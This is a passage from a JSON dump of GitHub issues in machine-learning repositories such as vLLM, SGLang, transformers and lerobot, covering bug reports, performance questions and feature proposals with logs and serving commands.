\"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/datasets/formatting/formatting.py\", line 612, in query_table\n _check_valid_index_key(key, size)\n File \"/admin/home/michel_aratingi/miniconda3/envs/groot/lib/python3.10/site-packages/datasets/formatting/formatting.py\", line 552, in _check_valid_index_key\n raise IndexError(f\"Invalid key: {key} is out of bounds for size {size}\")\nIndexError: Invalid key: 46969 is out of bounds for size 46963\n```\n\n### Checklist\n\n- [x] I have searched existing tickets to ensure this isn't a duplicate.\n- [x] I am using the latest version of the `main` branch.\n- [x] (I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\nMaybe if I try to update my transformers dependency?\n\nI edit this ticket", "url": "https://github.com/huggingface/lerobot/issues/2673", "state": "closed", "labels": [ "enhancement", "question", "dataset", "dependencies", "training" ], "created_at": "2025-12-17T21:35:31Z", "updated_at": "2025-12-17T23:26:54Z", "user": "imstevenpmwork" }, { "repo": "huggingface/lerobot", "number": 2670, "title": "Async inference for simulation (libero benchmark)", "body": "### Issue Type\n\n{\"label\" => \"\u2753 Technical Question\"}\n\n### Environment & System Info\n\n```Shell\n\n```\n\n### Description\n\nIs there any way that we can support async inference for simulator (e.g., libero)? This makes it possible to test RTC with simulators. \n\n### Context & Reproduction\n\nA question re a feature. \n\n### Expected Behavior / Desired Outcome\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing issues to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] (For bugs) I have verified this is not an environment-specific issue.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2670", "state": "open", "labels": [ "question", "simulation", "performance", "evaluation" ], "created_at": "2025-12-17T18:57:07Z", "updated_at": "2026-01-02T05:40:18Z", "user": "dywsjtu" }, { "repo": "huggingface/transformers", "number": 42930, "title": "Inconsistent handling of video_metadata in Qwen3VLVideoProcessor usage example", "body": "### System Info\n\ntransformers==4.57.3\n\n### Who can help?\n\n@zucchini-nlp @yonigozlan @molbap\n\n### Information\n\n- [x] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nI'm working with the `Qwen3VLVideoProcessor` and noticed a potential inconsistency between the processor's output and its expected usage.\n\nAccording to the current implementation of `Qwen3VLVideoProcessor._preprocess()`, the returned `BatchFeature` only contains the keys:\n- `\"pixel_values_videos\"`\n- `\"video_grid_thw\"`\n\nHowever, in some calling code, I see logic like:\n\n```python\nvideos_inputs = self.video_processor(videos=videos, **kwargs)\nif \"return_metadata\" not in kwargs:\n video_metadata = videos_inputs.pop(\"video_metadata\")\n```\n\nHow does it work? 
Thank you very much.\n\n### Expected behavior\n\nI want to switch from Qwen2.5-VL to Qwen3-VL but can't set a fixed nframes.", "url": "https://github.com/huggingface/transformers/issues/42930", "state": "closed", "labels": [ "bug" ], "created_at": "2025-12-17T17:21:00Z", "updated_at": "2025-12-18T10:32:23Z", "comments": 3, "user": "wagoriginal" }, { "repo": "vllm-project/vllm", "number": 30882, "title": "[Bug]: Marlin Fp8 Block Quant Failure", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\n### \ud83d\udc1b Describe the bug\n\n```bash\nMODEL := \"Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8\"\n#MODEL := \"RedHatAI/Mixtral-8x7B-Instruct-v0.1-FP8\"\n\nlaunch_marlin:\n\tVLLM_TEST_FORCE_FP8_MARLIN=1 VLLM_USE_DEEPGEMM=0 chg run --gpus 1 -- vllm serve {{MODEL}} --enforce-eager --max-model-len 8192\n\neval:\n\tlm_eval \\\n\t\t--model local-completions \\\n\t\t--tasks gsm8k \\\n\t\t--model_args \"model={{MODEL}},base_url=http://localhost:8000/v1/completions,num_concurrent=1000,tokenized_requests=False\"\n```\n\nResult:\n\n```bash\n(vllm) [robertgshaw2-redhat@nm-automation-h100-standalone-1-preserve vllm]$ just launch_marlin\nVLLM_TEST_FORCE_FP8_MARLIN=1 VLLM_USE_DEEPGEMM=0 chg run --gpus 1 -- vllm serve Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8 --enforce-eager --max-model-len 8192\nReserved 1 GPU(s): [1] for command execution\n(APIServer pid=3634068) INFO 12-17 15:54:23 [api_server.py:1259] vLLM API server version 0.13.0rc2.dev185+g00a8d7628\n(APIServer pid=3634068) INFO 12-17 15:54:23 [utils.py:253] non-default args: {'model_tag': 'Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8', 'model': 'Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8', 'max_model_len': 8192, 'enforce_eager': True}\n(APIServer pid=3634068) INFO 12-17 15:54:23 [model.py:514] Resolved architecture: Qwen3MoeForCausalLM\n(APIServer pid=3634068) INFO 12-17 15:54:23 [model.py:1661] Using max model len 8192\n(APIServer pid=3634068) INFO 12-17 15:54:24 [scheduler.py:230] Chunked prefill is enabled with max_num_batched_tokens=8192.\n(APIServer pid=3634068) WARNING 12-17 15:54:24 [vllm.py:622] Enforce eager set, overriding optimization level to -O0\n(APIServer pid=3634068) INFO 12-17 15:54:24 [vllm.py:722] Cudagraph is disabled under eager mode\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:31 [core.py:93] Initializing a V1 LLM engine (v0.13.0rc2.dev185+g00a8d7628) with config: model='Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8', speculative_config=None, tokenizer='Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=8192, download_dir=None, load_format=auto, tensor_parallel_size=1, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=fp8, enforce_eager=True, kv_cache_dtype=auto, device_config=cuda, structured_outputs_config=StructuredOutputsConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_parser='', reasoning_parser_plugin='', enable_in_reasoning=False), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None, kv_cache_metrics=False, kv_cache_metrics_sample=0.01, cudagraph_metrics=False, enable_layerwise_nvtx_tracing=False), seed=0, served_model_name=Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8, enable_prefix_caching=True, enable_chunked_prefill=True, pooler_config=None, compilation_config={'level': None, 'mode': , 'debug_dump_path': None, 'cache_dir': '', 'compile_cache_save_format': 'binary', 'backend': 'inductor', 'custom_ops': ['+quant_fp8', 'all', '+quant_fp8'], 'splitting_ops': [], 'compile_mm_encoder': False, 'compile_sizes': [], 'compile_ranges_split_points': [8192], 'inductor_compile_config': {'enable_auto_functionalized_v2': False, 'combo_kernels': True, 'benchmark_combo_kernel': True}, 'inductor_passes': {}, 'cudagraph_mode': , 'cudagraph_num_of_warmups': 0, 'cudagraph_capture_sizes': [], 'cudagraph_copy_inputs': False, 
'cudagraph_specialize_lora': True, 'use_inductor_graph_partition': False, 'pass_config': {'fuse_norm_quant': False, 'fuse_act_quant': False, 'fuse_attn_quant': False, 'eliminate_noops': False, 'enable_sp': False, 'fuse_gemm_comms': False, 'fuse_allreduce_rms': False}, 'max_cudagraph_capture_size': 0, 'dynamic_shapes_config': {'type': , 'evaluate_guards': False}, 'local_cache_dir': None}\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:32 [parallel_state.py:1210] world_size=1 rank=0 local_rank=0 distributed_init_method=tcp://10.243.64.5:43323 backend=nccl\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:32 [parallel_state.py:1418] rank 0 in world size 1 is assigned as DP rank 0, PP rank 0, PCP rank 0, TP rank 0, EP rank 0\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:33 [gpu_model_runner.py:3620] Starting to load model Qwen/Qwen3-Coder-30B-A3B-Instruct-FP8...\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:33 [deep_gemm.py:76] DeepGEMM E8M0 enabled on current platform.\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:33 [cuda.py:351] Using FLASH_ATTN attention backend out of potential backends: ('FLASH_ATTN', 'FLASHINFER', 'TRITON_ATTN', 'FLEX_ATTENTION')\n(EngineCore_DP0 pid=3634329) INFO 12-17 15:54:33 [layer.py:373] Enabled separate cuda str", "url": "https://github.com/vllm-project/vllm/issues/30882", "state": "closed", "labels": [ "bug", "help wanted", "good first issue" ], "created_at": "2025-12-17T15:55:18Z", "updated_at": "2025-12-17T16:02:54Z", "comments": 2, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 30879, "title": "[Doc]: Add some documentation about encoder compilation", "body": "### \ud83d\udcda The doc issue\n\nI want something like a design doc for encoder compilation. For example:\n- It uses support_torch_compile and set_model_tag to avoid cache collisions\n- it supports or doesn't support the following features that VllmBackend does: cudagraphs, compile_ranges, and a high-level explanation for how these are turned off or on.\n- it inherits from compilation_config (or maybe it doesn't)\n- here's how to turn it on/off\n\nI'm having a difficult time thinking through the edge cases in https://github.com/vllm-project/vllm/pull/30822 and https://github.com/vllm-project/vllm/pull/30489\n\ncc @Lucaskabela \n\n### Suggest a potential alternative/fix\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30879", "state": "open", "labels": [ "documentation", "torch.compile" ], "created_at": "2025-12-17T15:44:50Z", "updated_at": "2025-12-17T16:27:38Z", "comments": 1, "user": "zou3519" }, { "repo": "vllm-project/vllm", "number": 30865, "title": "[Usage]:Tools GLM4.6v with vLLM", "body": "### Your current environment\n\nHello,\n\nI am running tests on this model, which I find excellent. 
However, I am encountering a few issues and would like to know whether it is possible to fix them or if I am simply asking for the impossible.\n\nFirst of all, here is my vLLM configuration:\n\n`docker run -d \\ --name vllm-llm \\ --gpus '\"device=4,5,6,7\"' \\ -e NVIDIA_DRIVER_CAPABILITIES=compute,utility \\ -e VLLM_OBJECT_STORAGE_SHM_BUFFER_NAME=\"${SHM_NAME}\" \\ -v /raid/workspace/qladane/vllm/hf-cache:/root/.cache/huggingface \\ --env \"HF_TOKEN=${HF_TOKEN:-}\" \\ -p 8003:8000 \\ --ipc=host \\ --restart unless-stopped \\ vllm-openai:glm46v \\ zai-org/GLM-4.6V-FP8 \\ --tensor-parallel-size 4 \\ --enforce-eager \\ --served-model-name ImagineAI \\ --allowed-local-media-path / \\ --limit-mm-per-prompt '{\"image\": 1, \"video\": 0}' \\ --max-model-len 131072 \\ --dtype auto \\ --kv-cache-dtype fp8 \\ --gpu-memory-utilization 0.85 \\ --reasoning-parser glm45 \\ --tool-call-parser glm45 \\ --enable-auto-tool-choice \\ --enable-expert-parallel \\ --mm-encoder-tp-mode data \\ --mm-processor-cache-type shm`\n\nNext, here is my OpenWebUI configuration:\n\n\"Image\"\n\n\"Image\"\n\n\"Image\"\n\n\"Image\"\n\nI would like to know whether, with GLM-4.6V and OpenWebUI, it is possible to make the model choose and execute tools autonomously when it considers them relevant.\n\nAt the moment:\n\nIf it is an internet search, I have to manually activate the button, even though access is already available.\n\nIf it is Python code, I have to click \u201cexecute\u201d; it does not run it by itself, even though it clearly has access to Jupyter, etc.\n\nIf anyone has already encountered this issue.\n\nThank you very much in advance for your help.\n\nKind regards\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30865", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-17T10:51:34Z", "updated_at": "2025-12-18T08:33:44Z", "comments": 1, "user": "qBrabus" }, { "repo": "sgl-project/sglang", "number": 15321, "title": "[Feature][VLM] Support ViT Piecewise CUDA Graph for VLMs", "body": "### Checklist\n\n- [ ] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [ ] Please use English. 
Otherwise, it will be closed.\n\n### Motivation\n\nSupporting ViT Piecewise CUDA Graph for VLMs can improve their prefill performance.\n\n- [x] Support ViT PCG Framework https://github.com/sgl-project/sglang/pull/14422\n- [x] Support Qwen2.5-VL https://github.com/sgl-project/sglang/pull/14422\n- [x] Support Qwen3-VL https://github.com/sgl-project/sglang/pull/15320\n- [ ] Support InternVL\n- [ ] Support GLM-4.1V\n\n### Related resources\n\n_No response_", "url": "https://github.com/sgl-project/sglang/issues/15321", "state": "open", "labels": [ "performance", "Multi-modal", "vlm" ], "created_at": "2025-12-17T09:17:18Z", "updated_at": "2026-01-04T02:09:13Z", "comments": 0, "user": "yuan-luo" }, { "repo": "vllm-project/vllm", "number": 30859, "title": "[Bug]: set_current_vllm_config() is only done during the initialization stage but not the runtime stage", "body": "### Your current environment\n\nAny env\n\n### \ud83d\udc1b Describe the bug\n\n# Issue Statement\n\nCurrently, `set_current_vllm_config()` is only done during the initialization stage but not the runtime stage. If the code tries to call `get_current_vllm_config()`, vLLM prints a warning \"Current vLLM config is not set.\" and returns a default config.\n\nHowever, this approach is problematic because:\n\n1. When contributors change the code, many of us did not realize that `get_current_vllm_config()` should only be called during the init stage and should not be called during the runtime stage.\n2. It's just a warning instead of a hard failure, so contributors may not notice this when they run local tests.\n3. Such warnings could be annoying to users because they may be printed for every single decoding step. Plus, the warning doesn't carry any useful info about how to fix/bypass the issue.\n4. The default config may be completely incorrect for the caller function.\n5. Warning prints on every step might impact performance, because print isn't a fast operation. (thanks to @vadiklyutiy )\n\n# Requirements\n\nWe should change the behavior such that:\n\n- `get_current_vllm_config()` either returns the real config set by the user or raises an error if the config does not exist.\n\n# Related Issues\n\nThese issues have appeared many times in the past. 
Although the fix is usually not difficult, it is an annoying recurrent issue that we should prevent in the future to avoid wasted engineering effort.\n\n- https://github.com/vllm-project/vllm/issues/13207\n- https://github.com/vllm-project/vllm/pull/29999\n- https://github.com/vllm-project/vllm/issues/30185\n- https://github.com/vllm-project/vllm/issues/30240\n- https://github.com/vllm-project/vllm/issues/30571\n\n\n# Possible Solutions\n\n## Solution A: `set_current_vllm_config()` for runtime stage as well\n\nSuch that `get_current_vllm_config()` is always available, regardless of init stage or runtime stage.\n\n## Solution B: Convert the warning in `get_current_vllm_config()` to a hard failure\n\nBut this means we may need to fix lots of CI failures.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30859", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-17T08:59:49Z", "updated_at": "2025-12-22T18:09:55Z", "comments": 7, "user": "nvpohanh" }, { "repo": "sgl-project/sglang", "number": 15319, "title": "[Feature] RFC: AutoSpec, Automatic Runtime Speculative Inference Parameter Tuning", "body": "### Checklist\n\n- [x] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Motivation\n\n## Summary\n\nThis proposal introduces automatic runtime tuning for speculative inference parameters in SGLang. Instead of requiring users to manually set speculative_num_steps, speculative_topk, and speculative_num_draft_tokens, the system dynamically adjusts them using a feedback-driven controller. This maximizes throughput while respecting hardware limits and draft model capabilities\u2014without any manual configuration. \n\n## Problem & Motivation\n\nCurrently, users of speculative inference in SGLang must manually tune several parameters:\n\n- speculative_num_steps\n- speculative_topk\n- speculative_num_draft_tokens\n\n\"Image\"\n\nFrom the graph, we see that throughput varies with speculative_num_steps and batch size, and it also suggests that a well-tuned parameter configuration of speculative inference can increase throughput by 5%~50%. These findings suggest three current issues:\n\n1. Trial-and-error overhead \u2013 Finding optimal values per model/hardware/workload is tedious and often results in suboptimal performance.\n\n2. Model capability mismatch \u2013 Different draft models have different effective limits, but static parameters cannot adapt.\n\n3. Batch-size sensitivity \u2013 The optimal number of speculative steps decreases as batch size grows, due to compute constraints.\n\nA single fixed configuration cannot perform well across varying models, hardware, and batch sizes.\n\n## Proposed Design\n\nWe propose a lightweight feedback controller that adjusts speculative_num_steps in real time based on runtime metrics. 
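\n\nA minimal sketch of the controller core, to make the rules below concrete (illustrative only; names and thresholds are placeholders, not an implemented SGLang API):\n\n```python\ndef adjust_steps(steps: int, accept_rate: float, accept_len_growth: float,\n                 max_steps_for_batch: int, hi: float = 0.6, lo: float = 0.5,\n                 growth_thres: float = 0.4) -> int:\n    # Negative-feedback rule: grow while drafting keeps paying off,\n    # shrink when acceptance collapses, otherwise hold steady.\n    if accept_rate >= hi and accept_len_growth > growth_thres and steps < max_steps_for_batch:\n        return steps + 1\n    if accept_rate < lo and steps > 1:\n        return steps - 1\n    return steps\n```\n\n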
For simplicity and stability, we keep speculative_topk=1 and speculative_num_draft_tokens=speculative_num_steps+1 (following observed best practices).\n\n### Core Architecture\n\nThe system monitors two metrics after each batch:\n\n- Acceptance rate \u2013 ratio of accepted draft tokens.\n\n- Acceptance length growth \u2013 how much accepted length changes when steps increase.\n\nUsing these, it applies the following simple rules:\n\n1. Increase steps if:\n\n- Acceptance rate is high (configurable, e.g., \u22650.6)\n\n- Acceptance length grows sufficiently (exceeding a model-aware threshold)\n\n- Hardware limits for the current batch size are not exceeded\n\n2. Decrease steps if:\n\n- Acceptance rate is low (e.g., <0.5)\n\n3. Otherwise, keep steps unchanged.\n\nThis forms a stable negative-feedback loop that converges to a near-optimal step count for the current workload.\n\n### Detailed Designs\n\n#### Initialization Phase\n\nDuring system startup, the following initialization sequence occurs:\n\n1. **Computational Threshold Calculation**: For each possible batch size (1, 2, 4, 8, 16, 32, 64), compute the maximum allowable speculative steps given hardware constraints(thres_batchsize);\n2. **Draft Model Ability Analysis**: (Optional) Assess draft model capabilities and establish maximum effective step boundaries. (This step is optional, parameters can be dynamically adjusted and saved during runtime.)\n3. **Theoretical Threshold Establishment**: Calculate lower bound of theoretical accept length growth thresholds for different speculative step values. \n\n#### Runtime Parameter Adjustment Logic\n\nThe adjustment algorithm implements a conservative approach to prevent oscillation:\n\n\"Image\"\n\n```\nFor each batch run:\n 1. Collect metrics: acceptance_rate, acceptance_length_growth_rate\n 2. 
speculative_num_steps += 1 if (acceptance_length_growth_rate > thres_accept_length_growth_rate AND accept_rate >= thres_positive_accept_rate AND speculative_num_step+1, 'debug_dump_path': None, 'cache_dir': '', 'compile_cache_save_format': 'binary', 'backend': 'inductor', 'custom_ops': ['none'], 'splitting_ops': ['vllm::unified_attention', 'vllm::unified_attention_with_output', 'vllm::unified_mla_attention', 'vllm::unified_mla_attention_with_output', 'vllm::mamba_mixer2', 'vllm::mamba_mixer', 'vllm::short_conv', 'vllm::linear_attention', 'vllm::plamo2_mamba_mixer', 'vllm::gdn_attention_core', 'vllm::kda_attention', 'vllm::sparse_attn_indexer'], 'compile_mm_encoder': False, 'compile_sizes': [], 'inductor_compile_config': {'enable_auto_functionalized_v2': False, 'combo_kernels': True, 'benchmark_combo_kernel': True}, 'inductor_passes': {}, 'cudagraph_mode': , 'cudagraph_num_of_warmups': 1, 'cudagraph_capture_sizes': [1, 2, 4, 8, 16, 24, 32, 40, 48, 56, 64, 72, 80, 88, 96, 104, 112, 120, 128, 136, 144, 152, 160, 168, 176, 184, 192, 200, 208, 216, 224, 232, 240, 248, 256, 272, 288, 304, 320, 336, 352, 368, 384, 400, 416, 432, 448, 464, 480, 496, 512], 'cudagraph_copy_inputs': False, 'cudagraph_specialize_lora': True, 'use_inductor_graph_partition': False, 'pass_config': {'fuse_norm_quant': False, 'fuse_act_quant': False, 'fuse_attn_quant': False, 'eliminate_noops': True, 'enable_sp': False, 'fuse_gemm_comms': False, 'fuse_allreduce_rms': False}, 'max_cudagraph_capture_size': 512, 'dynamic_shapes_config': {'type': }, 'local_cache_dir': None}\n(EngineCore_DP0 pid=732093) /home/smc01/miniconda3/envs/vLLM_12/lib/python3.10/site-packages/torch/cuda/__init__.py:283: UserWarning: \n(EngineCore_DP0 pid=732093) Found GPU0 NVIDIA GB10 which is of cuda capabilit", "url": "https://github.com/vllm-project/vllm/issues/30855", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-17T08:44:11Z", "updated_at": "2025-12-17T08:44:11Z", "comments": 0, "user": "nanbogong" }, { "repo": "vllm-project/vllm", "number": 30847, "title": "[Bug]: Qwen 3VL via Efficient Video Sampling (EVS) to trim video embeddings and found that the number of tokens after timestamp in the Prompt was not aligned with the actual number of tokens after pruning?", "body": "### Your current environment\n\n
\nvllm serve Qwen3-VL-8B --video-pruning-rate=0.75 \n\nmessages=[\n {\n \"role\": \"user\",\n \"content\": [\n # {\"type\": \"text\", \"text\": \"What's in this video?\"},\n {\"type\": \"text\", \"text\": \"What do this video and this image each describe?\"},\n {\n \"type\": \"video_url\",\n \"video_url\": {\n \"url\": \"file:///codes/data/video/Tom_Jerry.mp4\",\n \"fps\": 1,\n },\n }\n ],\n }\n ],\nThe output of python collect_env.py\n\n\n\n\n\n```text\nThe get_video_replacement_qwen3vl method in the qwen3_vl.py file:\nFirstly: calculate the number of tokens per frame.\nSecondly: add the specific timestamp <{cur_time:.1f}s> to the prompt, followed by the calculated number of tokens for that frame.\nAt this point, the number of tokens per frame is derived from the pruning rate, so except for the first frame, the token count after each timestamp is the same (EVS is not used to calculate the actual tokens here).\n\nThe EVS algorithm actually reserves a different number of tokens for each frame. This causes the token count after each timestamp to be inconsistent with the actual number of tokens retained after pruning.\n```\n\n
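To make the reported mismatch concrete, a toy sketch (made-up counts, not the actual vLLM implementation):

```python
# Toy illustration of the reported desync. The prompt placeholder logic
# assigns every frame after the first the same token count, while the EVS
# retention mask keeps a per-frame count that varies. All values made up.
placeholder_counts = [165] + [33] * 15             # what the prompt encodes
mask_counts = [165, 40, 21, 33, 28, 38, 33, 29,    # what EVS actually keeps
               33, 37, 30, 33, 36, 31, 28, 45]

assert sum(placeholder_counts) == sum(mask_counts)  # totals agree (660)...
mismatched = [i for i, (p, m) in
              enumerate(zip(placeholder_counts, mask_counts)) if p != m]
print(mismatched)  # ...but most frames differ, so timestamps and tokens desync
```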
\n### \ud83d\udc1b Describe the bug\n\n\n1. get_video_replacement_qwen3vl \nframes_idx_token=[165, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33, 33]\n\n\"Image\"\n2. compute_retention_mask\n\n\"Image\"\n\n\"Image\"\n\n3. embed_input_ids\n\"Image\"\ninput_ids:\n\"Image\"\n\nFrom items 1 and 3 above, it can be seen that the data in frames_idx_token is the same as that in embed_input_ids: the first frame contains 165 tokens, while the rest contain 33 tokens.\n151656 is the ID of the video token, so the count of 151656 occurrences gives the number of video tokens. The total number of video tokens across all frames equals the sum of frames_idx_token.\nRegarding item 2: in the EVS retention mask produced by compute_retention_mask, the first frame has 165 tokens, while the other frames have varying token counts.\nBased on items 1, 2, and 3, it can be concluded that the current implementation of the EVS pruning algorithm has a problem: the number of tokens after each timestamp in the prompt does not match the actual number of tokens that should be retained after EVS pruning.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30847", "state": "open", "labels": [ "bug" ], "created_at": "2025-12-17T06:46:15Z", "updated_at": "2026-01-04T07:39:17Z", "comments": 5, "user": "xshqhua" }, { "repo": "vllm-project/vllm", "number": 30832, "title": "[Performance]: DeepSeek-V3.2 on 8xH20 30 decode tokens/sec", "body": "### Proposal to improve performance\n\n**My Env:**\nvllm 0.13.0rc2.dev178+g676db55ee\ndeep_gemm 2.1.1+c9f8b34\ncuda 12.9\npython 3.10.18\n\n**command** is the same as:\nvllm serve mypath/DeepSeek-V3.2 \\\n --tensor-parallel-size 8 \\\n --tokenizer-mode deepseek_v32 \\\n --tool-call-parser deepseek_v32 \\\n --enable-auto-tool-choice \\\n --reasoning-parser deepseek_v3\n\n**My Question:**\nThe output throughput is 30 tokens/s for a single request, which is slower than expected based on https://docs.vllm.ai/projects/recipes/en/latest/DeepSeek/DeepSeek-V3_2.html#benchmarking:\n\nIs there anything wrong with this?\n\n------------------------------------------------\nBenchmarking[\u00b6](https://docs.vllm.ai/projects/recipes/en/latest/DeepSeek/DeepSeek-V3_2.html#benchmarking)\nWe used the following script to benchmark deepseek-ai/DeepSeek-V3.2 on 8xH20.\n\n\nvllm bench serve \\\n --model deepseek-ai/DeepSeek-V3.2 \\\n --dataset-name random \\\n --random-input 2048 \\\n --random-output 1024 \\\n --request-rate 10 \\\n --num-prompt 100 \\ \n --trust-remote-code\nTP8 Benchmark Output[\u00b6](https://docs.vllm.ai/projects/recipes/en/latest/DeepSeek/DeepSeek-V3_2.html#tp8-benchmark-output)\n\n============ Serving Benchmark Result ============\nSuccessful requests: 100 \nFailed requests: 0 \nRequest rate configured (RPS): 10.00 \nBenchmark duration (s): 129.34 \nTotal input tokens: 204800 \nTotal generated tokens: 102400 \nRequest throughput (req/s): 0.77 \nOutput token throughput (tok/s): 791.73 \nPeak output token throughput (tok/s): 1300.00 \nPeak concurrent requests: 100.00 \nTotal Token throughput (tok/s): 2375.18 \n---------------Time to First Token----------------\nMean TTFT (ms): 21147.20 \nMedian TTFT (ms): 21197.97 \nP99 TTFT (ms): 41133.00 \n-----Time per Output Token (excl. 
1st token)------\nMean TPOT (ms): 99.71 \nMedian TPOT (ms): 99.25 \nP99 TPOT (ms): 124.28 \n---------------Inter-token Latency----------------\nMean ITL (ms): 99.71 \nMedian ITL (ms): 76.89 \nP99 ITL (ms): 2032.37 \n==================================================\n\n### Report of performance regression\n\n_No response_\n\n### Misc discussion on performance\n\n_No response_\n\n### Your current environment (if you think it is necessary)\n\n```text\nThe output of `python collect_env.py`\n```\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30832", "state": "open", "labels": [ "performance" ], "created_at": "2025-12-17T03:08:52Z", "updated_at": "2025-12-18T08:01:30Z", "comments": 1, "user": "lisp2025" }, { "repo": "huggingface/candle", "number": 3247, "title": "Parakeet V3 support?", "body": "Any plans to support Parakeet V3 by any chance? Thank you \ud83d\ude4f ", "url": "https://github.com/huggingface/candle/issues/3247", "state": "open", "labels": [], "created_at": "2025-12-16T19:05:33Z", "updated_at": "2025-12-16T19:05:33Z", "comments": 0, "user": "mobicham" }, { "repo": "vllm-project/vllm", "number": 30798, "title": "[Usage]: vllm offline server lora model", "body": "### Your current environment\n\n\n\nHi team,\n\nI have a question about deploying LoRA models with a vLLM offline server.\n\nCurrently, we have a base model **A**. After LoRA training, we obtain adapter parameters **P**. When we serve model A with vLLM (offline server) and enable LoRA, we can select either the **base model A** or **A + P** (LoRA adapter) from the `/v1/models` list for inference.\n\nBased on this, suppose we **merge A and P** into a new merged model **B = A + P**, and then continue LoRA training on top of **B** to obtain another LoRA adapter **Q**.\n\nIs there a way to deploy on a single vLLM server such that the models list allows choosing among these three options for inference?\n\n1. **A**\n2. **A + P**\n3. **A + P + Q**\n\nIf vLLM cannot directly stack LoRA adapters (P then Q) at runtime, is there a recommended approach to **combine P and Q** into a new equivalent adapter (e.g., a single LoRA adapter **R**) that is functionally equivalent to **A + P + Q**, ideally in a way that is **equivalent to training a LoRA adapter directly on base A**?\n\nThanks a lot for your help!\n\n---\n\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/30798", "state": "open", "labels": [ "usage" ], "created_at": "2025-12-16T16:38:49Z", "updated_at": "2025-12-18T11:52:39Z", "comments": 4, "user": "zapqqqwe" }, { "repo": "sgl-project/sglang", "number": 15266, "title": "Multi-Adapter Support for Embed Qwen3 8B Embedding Model", "body": "### Checklist\n\n- [x] If this is not a feature request but a general question, please start a discussion at https://github.com/sgl-project/sglang/discussions. 
Otherwise, it will be closed.\n- [x] Please use English. Otherwise, it will be closed.\n\n### Motivation\n\nHi Team, do we currently support multi-adapter (LoRA) support for embedding models, specifically Qwen3 8B Embedding model? If not, when can we expect the support? Thanks :)\n\n### Related resources\n\nI'm training the model for three different tasks using separate lora adapters and need to deploy the model with one base and the three different adapters.\n\nThis is similar to how [Jina v4](https://huggingface.co/jinaai/jina-embeddings-v4) Embedding model has task specific adapters.\n\nMy adapter config looks like this -\n```\n{\n \"alpha_pattern\": {},\n \"auto_mapping\": null,\n \"base_model_name_or_path\": \"/temp/local-ssd/models/Qwen3-Embedding-8B\",\n \"bias\": \"none\",\n \"corda_config\": null,\n \"eva_config\": null,\n \"exclude_modules\": null,\n \"fan_in_fan_out\": false,\n \"inference_mode\": true,\n \"init_lora_weights\": true,\n \"layer_replication\": null,\n \"layers_pattern\": null,\n \"layers_to_transform\": null,\n \"loftq_config\": {},\n \"lora_alpha\": 128,\n \"lora_bias\": false,\n \"lora_dropout\": 0.1,\n \"megatron_config\": null,\n 